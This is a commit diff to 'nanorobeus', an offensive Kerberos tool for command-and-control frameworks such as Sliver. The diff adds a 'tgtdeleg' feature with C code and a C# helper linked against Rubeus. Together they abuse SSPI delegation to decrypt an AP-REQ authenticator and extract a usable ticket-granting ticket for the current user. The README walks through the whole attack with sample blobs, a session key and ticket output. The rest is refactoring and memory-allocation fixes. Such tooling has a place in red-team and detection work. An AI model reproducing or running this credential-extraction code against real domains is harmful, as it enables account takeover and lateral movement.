STRLCPY/nanorobeus

■ ■ ■ ■ ■ ■

.gitignore

1	1		.vscode
	2	+	.vs
	3	+	bin/
	4	+	obj/

■ ■ ■ ■ ■ ■

Makefile

		skipped 5 lines
6	6
7	7		nanorobeus:
8	8		$(CC_x64) source/base64.c source/common.c source/klist.c source/luid.c source/ptt.c source/purge.c \
9		-	source/sessions.c source/entry.c -o dist/$(BOFNAME).x64.exe $(OPTIONS) -l advapi32 -l secur32
	9	+	source/sessions.c source/entry.c source/tgtdeleg.c -o dist/$(BOFNAME).x64.exe $(OPTIONS) -l advapi32 -l secur32
10	10		$(STRIP) --strip-all dist/$(BOFNAME).x64.exe
11	11
12	12		$(CC_x86) source/base64.c source/common.c source/klist.c source/luid.c source/ptt.c source/purge.c \
13		-	source/sessions.c source/entry.c -o dist/$(BOFNAME).x86.exe $(OPTIONS) -l advapi32 -l secur32
	13	+	source/sessions.c source/entry.c source/tgtdeleg.c -o dist/$(BOFNAME).x86.exe $(OPTIONS) -l advapi32 -l secur32
14	14		$(STRIP) --strip-all dist/$(BOFNAME).x86.exe
15	15
16	16		$(CC_x64) -c source/entry.c -o dist/$(BOFNAME).x64.o -DBOF $(OPTIONS)
		skipped 11 lines

■ ■ ■ ■ ■ ■ ■

README.md

		skipped 17 lines
18	18
19	19		ptt \<base64\> [/luid <0x0>] - import Kerberos ticket into a logon session
20	20
21		-	purge [/luid <0x0>] - purge Kerberos tickets
	21	+	purge [/luid <0x0>] - purge Kerberos tickets
	22	+
	23	+	tgtdeleg \<spn\> [\<enc_type_hex\>] - retrieve a usable TGT for the current user
22	24
23	25		## Examples
24	26		Get current logon ID.
		skipped 86 lines
111	113		=> nanorobeus64 purge
112	114
113	115		[+] Successfully purged tickets.
	116	+	```
	117	+	Retrieve a usable TGT for the current user. First, retrieve AP-REQ blob.
	118	+	```
	119	+	=> nanorobeus64 tgtdeleg cifs/dc.fortress.local
	120	+
	121	+	[+] AP-REQ blob: YIIMNwYJKoZIhvcSAQICAQBuggwmMIIMIqADAgEFoQMCAQ6iBwMFA...(snip)...
	122	+	```
	123	+	Then determine an encryption type.
	124	+	```
	125	+	$ TgtDeleg.exe YIIMNwYJKoZIhvcSAQICAQBuggwmMIIMIqADAgEFoQMCAQ6iBwMFA...(snip)...
	126	+	[*] Authenticator etype: 0x12 (aes256_cts_hmac_sha1)
	127	+	```
	128	+	Retrieve a session key.
	129	+	```
	130	+	=> nanorobeus64 tgtdeleg cifs/dc.fortress.local 0x12
	131	+
	132	+	[*] Encryption: AES256_CTS_HMAC_SHA1
	133	+	[+] Session key: 1/0kOhaO+7bRVPUABp0q4IFazZDc2l3GOcWYTuL/bDk=
	134	+	```
	135	+	Finally, specify the session key and retrieve a usable TGT ticket.
	136	+	```
	137	+	$ TgtDeleg.exe YIIMNwYJKoZIhvcSAQICAQBuggwmMIIMIqADAgEFoQMCAQ6iBwMFA...(snip)... 1/0kOhaO+7bRVPUABp0q4IFazZDc2l3GOcWYTuL/bDk=
	138	+	[*] Authenticator etype: 0x12 (aes256_cts_hmac_sha1)
	139	+	[*] Ticket: doIFeDCCBXSgAwIBBaEDAgEWooIEcjCCBG5hggRqMIIEZq...(snip)...
114	140		```
115	141
116	142		## Credits
		skipped 2 lines

■ ■ ■ ■ ■ ■

TgtDeleg/Program.cs

1	+	using System;
2	+	using System.Collections.Generic;
3	+	using System.Linq;
4	+	using System.Text;
5	+	using System.Runtime.InteropServices;
6	+	using System.ComponentModel;
7	+
8	+	using Rubeus;
9	+
10	+	namespace TgtDeleg
11	+	{
12	+	class Program
13	+	{
14	+	static void Main(string[] args)
15	+	{
16	+	try
17	+	{
18	+	if (args.Length == 0)
19	+	{
20	+	return;
21	+	}
22	+
23	+	byte[] KeberosV5 = { 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x12, 0x01, 0x02, 0x02 }; // 1.2.840.113554.1.2.2
24	+	var ClientTokenArray = Convert.FromBase64String(args[0]);
25	+	var index = Helpers.SearchBytePattern(KeberosV5, ClientTokenArray);
26	+	if (index > 0)
27	+	{
28	+	var startIndex = index += KeberosV5.Length;
29	+	if ((ClientTokenArray[startIndex] == 1) && (ClientTokenArray[startIndex + 1] == 0))
30	+	{
31	+	startIndex += 2;
32	+	var apReqArray = new byte[ClientTokenArray.Length - startIndex];
33	+	Buffer.BlockCopy(ClientTokenArray, startIndex, apReqArray, 0, apReqArray.Length);
34	+	var asn_AP_REQ = Asn1.AsnElt.Decode(apReqArray, false);
35	+
36	+	foreach (var elt in asn_AP_REQ.Sub[0].Sub)
37	+	{
38	+	if (elt.TagValue == 4)
39	+	{
40	+	// build the encrypted authenticator
41	+	var encAuthenticator = new EncryptedData(elt.Sub[0]);
42	+	var authenticatorEtype = (Interop.KERB_ETYPE)encAuthenticator.etype;
43	+	Console.WriteLine("[*] Authenticator etype: 0x{1} ({0})", authenticatorEtype, ((int)authenticatorEtype).ToString("X"));
44	+	byte[] key;
45	+	if (args.Length == 2)
46	+	{
47	+	key = Convert.FromBase64String(args[1]);
48	+	}
49	+	else
50	+	{
51	+	return;
52	+	}
53	+	var rawBytes = Crypto.KerberosDecrypt(authenticatorEtype, Interop.KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR, key, encAuthenticator.cipher);
54	+	var asnAuthenticator = Asn1.AsnElt.Decode(rawBytes, false);
55	+
56	+	foreach (var elt2 in asnAuthenticator.Sub[0].Sub)
57	+	{
58	+	if (elt2.TagValue == 3)
59	+	{
60	+	var cksumtype = Convert.ToInt32(elt2.Sub[0].Sub[0].Sub[0].GetInteger());
61	+
62	+	// check if cksumtype == GSS_CHECKSUM_TYPE
63	+	if (cksumtype == 0x8003)
64	+	{
65	+	var checksumBytes = elt2.Sub[0].Sub[1].Sub[0].GetOctetString();
66	+
67	+	// check if the flags include GSS_C_DELEG_FLAG
68	+	if ((checksumBytes[20] & 1) == 1)
69	+	{
70	+	var dLen = BitConverter.ToUInt16(checksumBytes, 26);
71	+	var krbCredBytes = new byte[dLen];
72	+	// copy out the krbCredBytes from the checksum structure
73	+	Buffer.BlockCopy(checksumBytes, 28, krbCredBytes, 0, dLen);
74	+
75	+	var asn_KRB_CRED = Asn1.AsnElt.Decode(krbCredBytes, false);
76	+	Ticket ticket = null;
77	+	var cred = new KRB_CRED();
78	+
79	+	foreach (var elt3 in asn_KRB_CRED.Sub[0].Sub)
80	+	{
81	+	if (elt3.TagValue == 2)
82	+	{
83	+	// extract the TGT and add it to the KRB-CRED
84	+	ticket = new Ticket(elt3.Sub[0].Sub[0].Sub[0]);
85	+	cred.tickets.Add(ticket);
86	+	}
87	+	else if (elt3.TagValue == 3)
88	+	{
89	+	var enc_part = elt3.Sub[0].Sub[1].GetOctetString();
90	+	var rawBytes2 = Crypto.KerberosDecrypt(authenticatorEtype, Interop.KRB_KEY_USAGE_KRB_CRED_ENCRYPTED_PART, key, enc_part);
91	+	var encKrbCredPartAsn = Asn1.AsnElt.Decode(rawBytes2, false);
92	+	cred.enc_part.ticket_info.Add(new KrbCredInfo(encKrbCredPartAsn.Sub[0].Sub[0].Sub[0].Sub[0]));
93	+	}
94	+	}
95	+
96	+	var kirbiBytes = cred.Encode().Encode();
97	+	var kirbiString = Convert.ToBase64String(kirbiBytes);
98	+	Console.WriteLine("[*] Ticket: {0}", kirbiString);
99	+	}
100	+	}
101	+	}
102	+	}
103	+	}
104	+	}
105	+	}
106	+	}
107	+	}
108	+	catch (Exception ex)
109	+	{
110	+	Console.WriteLine(ex);
111	+	}
112	+	}
113	+	}
114	+	}
115	+

■ ■ ■ ■ ■ ■

TgtDeleg/Properties/AssemblyInfo.cs

1	+	using System.Reflection;
2	+	using System.Runtime.CompilerServices;
3	+	using System.Runtime.InteropServices;
4	+
5	+	// General Information about an assembly is controlled through the following
6	+	// set of attributes. Change these attribute values to modify the information
7	+	// associated with an assembly.
8	+	[assembly: AssemblyTitle("")]
9	+	[assembly: AssemblyDescription("")]
10	+	[assembly: AssemblyConfiguration("")]
11	+	[assembly: AssemblyCompany("")]
12	+	[assembly: AssemblyProduct("")]
13	+	[assembly: AssemblyCopyright("")]
14	+	[assembly: AssemblyTrademark("")]
15	+	[assembly: AssemblyCulture("")]
16	+
17	+	// Setting ComVisible to false makes the types in this assembly not visible
18	+	// to COM components. If you need to access a type in this assembly from
19	+	// COM, set the ComVisible attribute to true on that type.
20	+	[assembly: ComVisible(false)]
21	+
22	+	// The following GUID is for the ID of the typelib if this project is exposed to COM
23	+	[assembly: Guid("02d739af-1767-4082-8a6b-e60a89aee077")]
24	+
25	+	// Version information for an assembly consists of the following four values:
26	+	//
27	+	// Major Version
28	+	// Minor Version
29	+	// Build Number
30	+	// Revision
31	+	//
32	+	// You can specify all the values or you can default the Build and Revision Numbers
33	+	// by using the '*' as shown below:
34	+	// [assembly: AssemblyVersion("1.0.*")]
35	+	[assembly: AssemblyVersion("1.0.0.0")]
36	+	[assembly: AssemblyFileVersion("1.0.0.0")]
37	+

TgtDeleg/Rubeus.dll

Binary file.

■ ■ ■ ■ ■ ■

TgtDeleg/TgtDeleg.csproj

1	+	<?xml version="1.0" encoding="utf-8"?>
2	+	<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3	+	<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
4	+	<PropertyGroup>
5	+	<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
6	+	<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
7	+	<ProjectGuid>{02D739AF-1767-4082-8A6B-E60A89AEE077}</ProjectGuid>
8	+	<OutputType>Exe</OutputType>
9	+	<RootNamespace>TgtDeleg</RootNamespace>
10	+	<AssemblyName>TgtDeleg</AssemblyName>
11	+	<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
12	+	<FileAlignment>512</FileAlignment>
13	+	<Deterministic>true</Deterministic>
14	+	</PropertyGroup>
15	+	<PropertyGroup Condition=" '$(Configuration)\|$(Platform)' == 'Debug\|AnyCPU' ">
16	+	<PlatformTarget>AnyCPU</PlatformTarget>
17	+	<DebugSymbols>true</DebugSymbols>
18	+	<DebugType>full</DebugType>
19	+	<Optimize>false</Optimize>
20	+	<OutputPath>bin\Debug\</OutputPath>
21	+	<DefineConstants>DEBUG;TRACE</DefineConstants>
22	+	<ErrorReport>prompt</ErrorReport>
23	+	<WarningLevel>4</WarningLevel>
24	+	</PropertyGroup>
25	+	<PropertyGroup Condition=" '$(Configuration)\|$(Platform)' == 'Release\|AnyCPU' ">
26	+	<PlatformTarget>AnyCPU</PlatformTarget>
27	+	<DebugType>none</DebugType>
28	+	<Optimize>true</Optimize>
29	+	<OutputPath>bin\Release\</OutputPath>
30	+	<DefineConstants>TRACE</DefineConstants>
31	+	<ErrorReport>prompt</ErrorReport>
32	+	<WarningLevel>4</WarningLevel>
33	+	</PropertyGroup>
34	+	<ItemGroup>
35	+	<Reference Include="Rubeus">
36	+	<HintPath>.\Rubeus.dll</HintPath>
37	+	</Reference>
38	+	<Reference Include="System" />
39	+	<Reference Include="System.Core" />
40	+	<Reference Include="System.Xml.Linq" />
41	+	<Reference Include="System.Data.DataSetExtensions" />
42	+	<Reference Include="Microsoft.CSharp" />
43	+	<Reference Include="System.Data" />
44	+	<Reference Include="System.Xml" />
45	+	</ItemGroup>
46	+	<ItemGroup>
47	+	<Compile Include="Program.cs" />
48	+	<Compile Include="Properties\AssemblyInfo.cs" />
49	+	</ItemGroup>
50	+	<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
51	+	</Project>

■ ■ ■ ■ ■ ■

TgtDeleg/TgtDeleg.sln

1	+
2	+	Microsoft Visual Studio Solution File, Format Version 12.00
3	+	# Visual Studio Version 17
4	+	VisualStudioVersion = 17.2.32516.85
5	+	MinimumVisualStudioVersion = 10.0.40219.1
6	+	Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TgtDeleg", "TgtDeleg.csproj", "{02D739AF-1767-4082-8A6B-E60A89AEE077}"
7	+	EndProject
8	+	Global
9	+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10	+	Debug\|Any CPU = Debug\|Any CPU
11	+	Release\|Any CPU = Release\|Any CPU
12	+	EndGlobalSection
13	+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14	+	{02D739AF-1767-4082-8A6B-E60A89AEE077}.Debug\|Any CPU.ActiveCfg = Debug\|Any CPU
15	+	{02D739AF-1767-4082-8A6B-E60A89AEE077}.Debug\|Any CPU.Build.0 = Debug\|Any CPU
16	+	{02D739AF-1767-4082-8A6B-E60A89AEE077}.Release\|Any CPU.ActiveCfg = Release\|Any CPU
17	+	{02D739AF-1767-4082-8A6B-E60A89AEE077}.Release\|Any CPU.Build.0 = Release\|Any CPU
18	+	EndGlobalSection
19	+	GlobalSection(SolutionProperties) = preSolution
20	+	HideSolutionNode = FALSE
21	+	EndGlobalSection
22	+	GlobalSection(ExtensibilityGlobals) = postSolution
23	+	SolutionGuid = {31687E07-23F0-446A-8015-327170CC9FC7}
24	+	EndGlobalSection
25	+	EndGlobal
26	+

■ ■ ■ ■ ■ ■

include/bofdefs.h

1	1		#pragma once
	2	+	#define SECURITY_WIN32
2	3
3	4		#include <windows.h>
4	5		#include <ntsecapi.h>
5	6		#include <sddl.h>
6	7		#include <tlhelp32.h>
7	8		#include <stdio.h>
	9	+	#include <lm.h>
	10	+	#include <security.h>
8	11
9	12		#if defined(BOF) \|\| defined(BRC4)
10	13
11	14		// kernel32
12	15		WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID);
13	16		WINBASEAPI DWORD WINAPI KERNEL32$GetLastError(VOID);
	17	+	WINBASEAPI VOID WINAPI KERNEL32$SetLastError(DWORD dwErrCode);
14	18		WINBASEAPI int WINAPI KERNEL32$FileTimeToSystemTime(CONST FILETIME* lpFileTime, LPSYSTEMTIME lpSystemTime);
15	19		WINBASEAPI HANDLE WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD dwFlags, DWORD th32ProcessID);
16	20		WINBASEAPI WINBOOL WINAPI KERNEL32$Process32FirstW(HANDLE hSnapshot, LPPROCESSENTRY32W lppe);
		skipped 14 lines
31	35		WINBASEAPI void __cdecl MSVCRT$free(void* memblock);
32	36		WINBASEAPI void* __cdecl MSVCRT$memcpy(void* __restrict__ _Dst, const void* __restrict__ _Src, size_t _MaxCount);
33	37		WINBASEAPI void __cdecl MSVCRT$memset(void* dest, int c, size_t count);
	38	+	WINBASEAPI int __cdecl MSVCRT$sprintf(char* __restrict__ _Dest, const char* __restrict__ _Format, ...);
	39	+	WINBASEAPI size_t __cdecl MSVCRT$mbstowcs(wchar_t * __restrict__ _Dest,const char * __restrict__ _Source,size_t _MaxCount);
34	40
35	41		// advapi32
36	42		WINADVAPI WINBOOL WINAPI ADVAPI32$OpenProcessToken(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
		skipped 38 lines
75	81		PNTSTATUS ProtocolStatus);
76	82		WINBASEAPI NTSTATUS WINAPI SECUR32$LsaDeregisterLogonProcess(HANDLE LsaHandle);
77	83		WINBASEAPI NTSTATUS WINAPI SECUR32$LsaConnectUntrusted(PHANDLE LsaHandle);
	84	+	WINBASEAPI SECURITY_STATUS WINAPI SECUR32$AcquireCredentialsHandleA(SEC_CHAR* pszPrincipal, SEC_CHAR* pszPackage,
	85	+	unsigned __LONG32 fCredentialUse, void* pvLogonId,
	86	+	void* pAuthData, SEC_GET_KEY_FN pGetKeyFn,
	87	+	void* pvGetKeyArgument, PCredHandle phCredential,
	88	+	PTimeStamp ptsExpiry);
	89	+	WINBASEAPI SECURITY_STATUS WINAPI SECUR32$InitializeSecurityContextA(
	90	+	PCredHandle phCredential, PCtxtHandle phContext, SEC_CHAR* pszTargetName, unsigned __LONG32 fContextReq,
	91	+	unsigned __LONG32 Reserved1, unsigned __LONG32 TargetDataRep, PSecBufferDesc pInput, unsigned __LONG32 Reserved2,
	92	+	PCtxtHandle phNewContext, PSecBufferDesc pOutput, unsigned __LONG32* pfContextAttr, PTimeStamp ptsExpiry);
	93	+	WINBASEAPI SECURITY_STATUS WINAPI SECUR32$FreeContextBuffer(void *pvContextBuffer);
	94	+	KSECDDDECLSPEC SECURITY_STATUS WINAPI SECUR32$DeleteSecurityContext(PCtxtHandle phContext);
	95	+	KSECDDDECLSPEC SECURITY_STATUS WINAPI SECUR32$FreeCredentialsHandle(PCredHandle phCredential);
78	96		#else
79	97
80	98		#define KERNEL32$GetCurrentProcess GetCurrentProcess
81	99		#define KERNEL32$GetLastError GetLastError
	100	+	#define KERNEL32$SetLastError SetLastError
82	101		#define KERNEL32$FileTimeToSystemTime FileTimeToSystemTime
83	102		#define KERNEL32$CreateToolhelp32Snapshot CreateToolhelp32Snapshot
84	103		#define KERNEL32$Process32FirstW Process32FirstW
		skipped 13 lines
98	117		#define MSVCRT$free free
99	118		#define MSVCRT$memcpy memcpy
100	119		#define MSVCRT$memset memset
	120	+	#define MSVCRT$sprintf sprintf
	121	+	#define MSVCRT$mbstowcs mbstowcs
101	122
102	123		#define ADVAPI32$OpenProcessToken OpenProcessToken
103	124		#define ADVAPI32$GetTokenInformation GetTokenInformation
		skipped 18 lines
122	143		#define SECUR32$LsaCallAuthenticationPackage LsaCallAuthenticationPackage
123	144		#define SECUR32$LsaDeregisterLogonProcess LsaDeregisterLogonProcess
124	145		#define SECUR32$LsaConnectUntrusted LsaConnectUntrusted
	146	+	#define SECUR32$AcquireCredentialsHandleA AcquireCredentialsHandleA
	147	+	#define SECUR32$InitializeSecurityContextA InitializeSecurityContextA
	148	+	#define SECUR32$FreeContextBuffer FreeContextBuffer
	149	+	#define SECUR32$DeleteSecurityContext DeleteSecurityContext
	150	+	#define SECUR32$FreeCredentialsHandle FreeCredentialsHandle
125	151		#endif

■ ■ ■ ■ ■ ■

include/common.h

		skipped 44 lines
45	45		NTSTATUS GetLsaHandle(HANDLE hProcessToken, BOOL highIntegrity, HANDLE* hLsa);
46	46		int GetProcessIdByName(WCHAR* processName);
47	47		BOOL ElevateToSystem();
48		-	// BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL
49		-	// bEnablePrivilege);
50	48		char* GetNarrowString(WCHAR* src);
51	49		char* GetNarrowStringFromUnicode(UNICODE_STRING src);
	50	+	WCHAR* GetWideString(char* src);

■ ■ ■ ■ ■ ■

include/tgtdeleg.h

1	+	#pragma once
2	+
3	+	#include <windows.h>
4	+	#include <lm.h>
5	+	#include "bofdefs.h"
6	+	#include "common.h"
7	+	#include "base64.h"
8	+
9	+	void execute_tgtdeleg(WCHAR** dispatch, char* spn);
10	+	void execute_tgtdeleg_getkey(WCHAR** dispatch, HANDLE hToken, char* target, LONG encType);

■ ■ ■ ■ ■ ■

sample_sliver.json

1	1		{
2	2		"name": "nanorobeus",
3		-	"version": "0.0.1",
	3	+	"version": "0.0.2",
4	4		"command_name": "nanorobeus",
5	5		"extension_author": "wavvs",
6	6		"original_author": "wavvs",
		skipped 17 lines
24	24		"arguments": [
25	25		{
26	26		"name": "command",
27		-	"desc": "Command to execute (luid, sessions, klist, dump, ptt, purge, help)",
	27	+	"desc": "Command to execute (luid, sessions, klist, dump, ptt, purge, tgtdeleg, help)",
28	28		"type": "string",
29	29		"optional": false
30	30		},
		skipped 26 lines

■ ■ ■ ■ ■ ■

source/common.c

		skipped 216 lines
217	217		return res;
218	218		}
219	219
220		-	// BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL
221		-	// bEnablePrivilege)
222		-	// {
223		-	// TOKEN_PRIVILEGES tp;
224		-	// LUID luid;
225		-
226		-	// if (!ADVAPI32$LookupPrivilegeValueA(NULL, lpszPrivilege, &luid))
227		-	// {
228		-	// return FALSE;
229		-	// }
230		-
231		-	// tp.PrivilegeCount = 1;
232		-	// tp.Privileges[0].Luid = luid;
233		-	// if (bEnablePrivilege)
234		-	// {
235		-	// tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
236		-	// }
237		-	// else
238		-	// {
239		-	// tp.Privileges[0].Attributes = 0;
240		-	// }
241		-
242		-	// if (!ADVAPI32$AdjustTokenPrivileges(hToken, FALSE, &tp,
243		-	// sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
244		-	// {
245		-	// return FALSE;
246		-	// }
247		-
248		-	// if (KERNEL32$GetLastError() == ERROR_NOT_ALL_ASSIGNED)
249		-	// {
250		-	// return FALSE;
251		-	// }
252		-
253		-	// return TRUE;
254		-	// }
255		-
256	220		char* GetNarrowStringFromUnicode(UNICODE_STRING src) {
257	221		int len = src.Length / sizeof(WCHAR);
258	222		char* dest = (char*)MSVCRT$calloc(len + 1, sizeof(char));
	223	+	if (dest == NULL) {
	224	+	return "(mem_alloc_error)";
	225	+	}
259	226		MSVCRT$wcstombs(dest, src.Buffer, len);
260	227		dest[len] = '\0';
261	228		return dest;
		skipped 2 lines
264	231		char* GetNarrowString(WCHAR* src) {
265	232		int len = MSVCRT$wcslen(src);
266	233		char* dest = (char*)MSVCRT$calloc(len + 1, sizeof(char));
	234	+	if (dest == NULL) {
	235	+	return "(mem_alloc_error)";
	236	+	}
267	237		MSVCRT$wcstombs(dest, src, len);
268	238		dest[len] = '\0';
269	239		return dest;
270	240		}
	241	+
	242	+	WCHAR* GetWideString(char* src) {
	243	+	int len = MSVCRT$strlen(src);
	244	+	WCHAR* dest = (WCHAR*)MSVCRT$calloc(len + 1, sizeof(WCHAR));
	245	+	if (dest == NULL) {
	246	+	return NULL;
	247	+	}
	248	+	MSVCRT$mbstowcs(dest, src, len);
	249	+	return dest;
	250	+	}

■ ■ ■ ■ ■ ■ ■

source/entry.c

		skipped 10 lines
11	11		#include "klist.c"
12	12		#include "base64.c"
13	13		#include "ptt.c"
	14	+	#include "tgtdeleg.c"
14	15		#else
15	16		#include "common.h"
16	17		#include "luid.h"
		skipped 2 lines
19	20		#include "klist.h"
20	21		#include "base64.h"
21	22		#include "ptt.h"
	23	+	#include "tgtdeleg.h"
22	24		#endif
23	25
24	26		void execute(WCHAR** dispatch, char* command, char* arg1, char* arg2, char* arg3, char* arg4);
		skipped 187 lines
212	214		MSVCRT$free(cLuid);
213	215		}
214	216		execute_purge(dispatch, hToken, luid, currentLuid);
	217	+	} else if (MSVCRT$strcmp(command, "tgtdeleg") == 0) {
	218	+	char* spn = NULL;
	219	+	int enc = 0;
	220	+	if (MSVCRT$strcmp(arg1, "") != 0) {
	221	+	spn = arg1;
	222	+	} else {
	223	+	goto end;
	224	+	}
	225	+
	226	+	if (MSVCRT$strcmp(arg2, "") != 0) {
	227	+	enc = MSVCRT$strtol(arg2, NULL, 16);
	228	+	if (enc == 0) {
	229	+	PRINT(dispatch, "[!] Specify valid encryption type.\n");
	230	+	goto end;
	231	+	}
	232	+	}
	233	+
	234	+	if (enc == 0) {
	235	+	execute_tgtdeleg(dispatch, spn);
	236	+	} else {
	237	+	PRINT(dispatch, "[*] Encryption: %s\n", GetEncryptionTypeString(enc));
	238	+	execute_tgtdeleg_getkey(dispatch, hToken, spn, enc);
	239	+	}
215	240		} else if (MSVCRT$strcmp(command, "help") == 0) {
216		-	PRINT(dispatch, "[] nanorobeus 0.0.1\n[] Command list:\n");
	241	+	PRINT(dispatch, "[] nanorobeus 0.0.2\n[] Command list:\n");
217	242		PRINT(dispatch, "\tluid\n");
218	243		PRINT(dispatch, "\tsessions [/luid <0x0> \| /all]\n");
219	244		PRINT(dispatch, "\tklist [/luid <0x0> \| /all]\n");
220	245		PRINT(dispatch, "\tdump [/luid <0x0> \| /all]\n");
221	246		PRINT(dispatch, "\tptt <BASE64> [/luid <0x0>]\n");
222	247		PRINT(dispatch, "\tpurge [/luid <0x0>]\n");
	248	+	PRINT(dispatch, "\ttgtdeleg <SPN> [<ENC_TYPE_HEX>]\n");
223	249		} else {
224	250		PRINT(dispatch, "[!] Unknown command.\n");
225	251		}
		skipped 4 lines

■ ■ ■ ■ ■ ■

source/klist.c

		skipped 73 lines
74	74		} else {
75	75		if (ticketSize > 0) {
76	76		int len = Base64encode_len(ticketSize);
77		-	char* encoded = (char)MSVCRT$calloc(len, sizeof(char));
	77	+	char* encoded = (char*)MSVCRT$calloc(len, sizeof(char));
78	78		if (encoded == NULL) {
79	79		PRINT(dispatch, "[!] Base64 - could not allocate memory.\n");
80	80		continue;
		skipped 36 lines
117	117		NTSTATUS status = STATUS_SUCCESS;
118	118		status = SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, retrieveRequest, responseSize, &retrieveResponse,
119	119		&responseSize, &protocolStatus);
	120	+	MSVCRT$free(retrieveRequest);
120	121		if (NT_SUCCESS(status)) {
121	122		if (NT_SUCCESS(protocolStatus)) {
122	123		if (responseSize > 0) {
123		-	ULONG size = retrieveResponse->Ticket.EncodedTicketSize * sizeof(UCHAR);
	124	+	ULONG size = retrieveResponse->Ticket.EncodedTicketSize;
124	125		PUCHAR returnTicket = (PUCHAR)MSVCRT$calloc(size, sizeof(UCHAR));
125	126		if (returnTicket != NULL) {
126	127		MSVCRT$memcpy(returnTicket, retrieveResponse->Ticket.EncodedTicket, size);
		skipped 14 lines
141	142		}
142	143
143	144		void PrintTicketFlags(WCHAR** dispatch, ULONG ticketFlags) {
144		-	if ((ticketFlags & KERB_TICKET_FLAGS_forwardable) == KERB_TICKET_FLAGS_forwardable) {
145		-	PRINT(dispatch, "forwardable");
146		-	}
147		-	if ((ticketFlags & KERB_TICKET_FLAGS_forwarded) == KERB_TICKET_FLAGS_forwarded) {
148		-	PRINT(dispatch, ", forwarded");
149		-	}
150		-	if ((ticketFlags & KERB_TICKET_FLAGS_proxiable) == KERB_TICKET_FLAGS_proxiable) {
151		-	PRINT(dispatch, ", proxiable");
	145	+
	146	+	char* flags[16] = {
	147	+	"name_canonicalize",
	148	+	"anonymous",
	149	+	"ok_as_delegate",
	150	+	"?",
	151	+	"hw_authent",
	152	+	"pre_authent",
	153	+	"initial",
	154	+	"renewable",
	155	+	"invalid",
	156	+	"postdated",
	157	+	"may_postdate",
	158	+	"proxy",
	159	+	"proxiable",
	160	+	"forwarded",
	161	+	"forwardable",
	162	+	"reserved"
	163	+	};
	164	+
	165	+	for (int i = 0; i < 16; i++) {
	166	+	if ((ticketFlags >> (i + 16)) & 1) {
	167	+	PRINT(dispatch, "%s ", flags[i]);
	168	+	}
152	169		}
153		-	if ((ticketFlags & KERB_TICKET_FLAGS_proxy) == KERB_TICKET_FLAGS_proxy) {
154		-	PRINT(dispatch, ", proxy");
155		-	}
156		-	if ((ticketFlags & KERB_TICKET_FLAGS_may_postdate) == KERB_TICKET_FLAGS_may_postdate) {
157		-	PRINT(dispatch, ", may_postdate");
158		-	}
159		-	if ((ticketFlags & KERB_TICKET_FLAGS_postdated) == KERB_TICKET_FLAGS_postdated) {
160		-	PRINT(dispatch, ", postdated");
161		-	}
162		-	if ((ticketFlags & KERB_TICKET_FLAGS_invalid) == KERB_TICKET_FLAGS_invalid) {
163		-	PRINT(dispatch, ", invalid");
164		-	}
165		-	if ((ticketFlags & KERB_TICKET_FLAGS_renewable) == KERB_TICKET_FLAGS_renewable) {
166		-	PRINT(dispatch, ", renewable");
167		-	}
168		-	if ((ticketFlags & KERB_TICKET_FLAGS_initial) == KERB_TICKET_FLAGS_initial) {
169		-	PRINT(dispatch, ", initial");
170		-	}
171		-	if ((ticketFlags & KERB_TICKET_FLAGS_pre_authent) == KERB_TICKET_FLAGS_pre_authent) {
172		-	PRINT(dispatch, ", pre_authent");
173		-	}
174		-	if ((ticketFlags & KERB_TICKET_FLAGS_hw_authent) == KERB_TICKET_FLAGS_hw_authent) {
175		-	PRINT(dispatch, ", hw_authent");
176		-	}
177		-	if ((ticketFlags & KERB_TICKET_FLAGS_ok_as_delegate) == KERB_TICKET_FLAGS_ok_as_delegate) {
178		-	#if (_WIN32_WINNT == 0x0501)
179		-	PRINT(dispatch, ", cname_in_pa_data");
180		-	#else
181		-	PRINT(dispatch, ", ok_as_delegate");
182		-	#endif
183		-	}
184		-	if ((ticketFlags & KERB_TICKET_FLAGS_name_canonicalize) == KERB_TICKET_FLAGS_name_canonicalize) {
185		-	PRINT(dispatch, ", name_canonicalize");
186		-	}
187		-	// if ((ticketFlags & KERB_TICKET_FLAGS_enc_pa_rep) ==
188		-	// KERB_TICKET_FLAGS_enc_pa_rep)
189		-	// {
190		-	// PRINT(dispatch, ", enc_pa_rep");
191		-	// }
192		-
193		-	PRINT(dispatch, " (0x%lx)\n", ticketFlags);
	170	+	PRINT(dispatch, "(0x%lx)\n", ticketFlags);
194	171		}
195	172
196	173		void PrintTicketInfo(WCHAR** dispatch, KERB_TICKET_CACHE_INFO_EX cacheInfo) {
		skipped 18 lines

■ ■ ■ ■ ■ ■

source/luid.c

		skipped 17 lines
18	18		}
19	19
20	20		LUID* luid = MSVCRT$calloc(1, sizeof(LUID));
	21	+	if (luid == NULL) {
	22	+	return NULL;
	23	+	}
21	24		luid->HighPart = tokenStats.AuthenticationId.HighPart;
22	25		luid->LowPart = tokenStats.AuthenticationId.LowPart;
23	26		return luid;
		skipped 1 lines

■ ■ ■ ■ ■ ■

source/purge.c

		skipped 37 lines
38	38		}
39	39		purgeRequest.RealmName = (UNICODE_STRING){.Buffer = L"", .Length = 0, .MaximumLength = 1};
40	40		purgeRequest.ServerName = (UNICODE_STRING){.Buffer = L"", .Length = 0, .MaximumLength = 1};
41		-	status =
